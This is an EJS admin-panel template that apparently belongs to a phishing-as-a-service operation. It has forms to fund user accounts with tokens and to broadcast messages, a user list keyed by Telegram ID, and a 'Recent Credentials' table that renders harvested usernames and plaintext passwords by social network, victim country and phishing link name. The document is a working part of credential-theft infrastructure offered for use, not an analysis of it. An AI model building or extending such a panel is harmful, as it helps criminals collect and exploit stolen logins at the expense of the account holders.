<div class="main-panel">
  <div class="content-wrapper">
    <div class="row">
      <div class="col-xl-4 col-sm-4 grid-margin stretch-card">
        <div class="card">
          <div class="card-body">
            <div class="row">
              <div class="col-9">
                <div class="d-flex align-items-center align-self-start">
                  <h3 class="mb-0"><%= users.length %> Users</h3>
                </div>
              </div>
              <div class="col-3">
                <div class="icon icon-box-success">
                  <span class="mdi mdi-cash icon-item"></span>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="row">
      <div class="grid-margin">
        <div class="container">
          <form method="post">
            <h3>Fund Account</h3>
            <hr />
            <%-include("../partials/messages")%>
            <div class="mb-3">
              <label for="">Username</label>
              <input
                type="text"
                name="username"
                placeholder="username"
                class="form-control"
              />
              <br />
              <label for="">Tokens</label>
              <input
                type="number"
                name="tokens"
                class="form-control"
                placeholder="tokens"
              />
              <br />
              <button type="submit" class="btn btn-success">Fund</button>
            </div>
          </form>
        </div>
      </div>
    </div>

    <div class="row">
      <div class="grid-margin">
        <div class="container">
          <form method="post" action="/admin/fund-all">
            <h3>Fund All Account</h3>
            <hr />
            <%-include("../partials/messages")%>
            <div class="mb-3">
              <label for="">Username</label>
              <label for="">Tokens</label>
              <input
                type="number"
                name="tokens"
                class="form-control"
                placeholder="tokens"
              />
              <br />
              <button type="submit" class="btn btn-success">Fund All</button>
            </div>
          </form>
        </div>
      </div>
    </div>

    <div class="row text-white">
      <div class="col-12 grid-margin">
        <div class="card">
          <div class="card-body">
            <h4 class="card-title">Users</h4>
            <p>
              Note: These links are subject to change, make sure you recheck
              before using
            </p>
            <div class="table-responsive">
              <table class="table" id="myTable">
                <thead>
                  <tr>
                    <th class="text-white">Username</th>
                    <th class="text-white">Tokens</th>
                    <th class="text-white">Telegram ID</th>
                    <th class="text-white">Date Joined</th>
                  </tr>
                </thead>
                <tbody>
                  <% users.reverse().forEach((u, index) => {%>
                  <tr>
                    <td class="text-white"><%= u.username %></td>
                    <td class="text-white"><%= u.tokens || 0 %></td>
                    <td class="text-white"><%= u.telegramID %></td>
                    <td class="text-white">
                      <%= moment(u.date).format("MMM Do YY h:mm a") %>
                    </td>
                  </tr>
                  <%})%>
                </tbody>
              </table>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="row text-white">
      <div class="col-12 grid-margin">
        <div class="card">
          <div class="card-body">
            <h4 class="card-title">Recent Credentials</h4>
            <div class="table-responsive">
              <table class="table" id="myTable2">
                <thead>
                  <tr>
                    <th class="text-white">Credentials</th>
                    <th class="text-white">Social Media</th>
                    <th class="text-white">Country</th>
                    <th class="text-white">Link Name</th>
                    <th class="text-white">Date</th>
                  </tr>
                </thead>
                <tbody>
                  <% credentials.reverse().slice(0,1000).forEach(c => {%>
                  <tr>
                    <td class="text-white">
                      <p class="text-white">
                        Username: <%= c.fields.username %>
                      </p>
                      <p class="text-white">
                        Password: <%= c.fields.password %>
                      </p>
                    </td>
                    <td class="text-white"><%= c.linkType %></td>
                    <td class="text-white"><%= c.country %></td>
                    <td class="text-white"><%= c.linkName %></td>
                    <td class="text-white">
                      <%= moment(c.date).format("MMM Do YY h:mm a") %>
                    </td>
                  </tr>
                  <%})%>
                </tbody>
              </table>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="row">
      <div class="grid-margin">
        <div class="container">
          <form method="post" action="/admin/send-mesage">
            <h3>Send Message</h3>
            <hr />
            <%-include("../partials/messages")%>
            <div class="mb-3">
              <label for="">Message</label>
              <br />
              <textarea
                name="message"
                style="min-width: 400px; min-height: 300px"
              ></textarea>
              <br />
              <button type="submit" class="btn btn-success">Send</button>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
</div>

<script
  src="https://code.jquery.com/jquery-3.7.1.min.js"
  integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
  crossorigin="anonymous"
></script>
<script src="https://cdn.datatables.net/1.13.8/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.13.8/js/dataTables.bootstrap4.min.js"></script>

<script>
  new DataTable("#myTable", {
    orderable: false,
    sorted: false,
  });
  new DataTable("#myTable2", {
    orderable: false,
    sorted: false,
  });
</script>
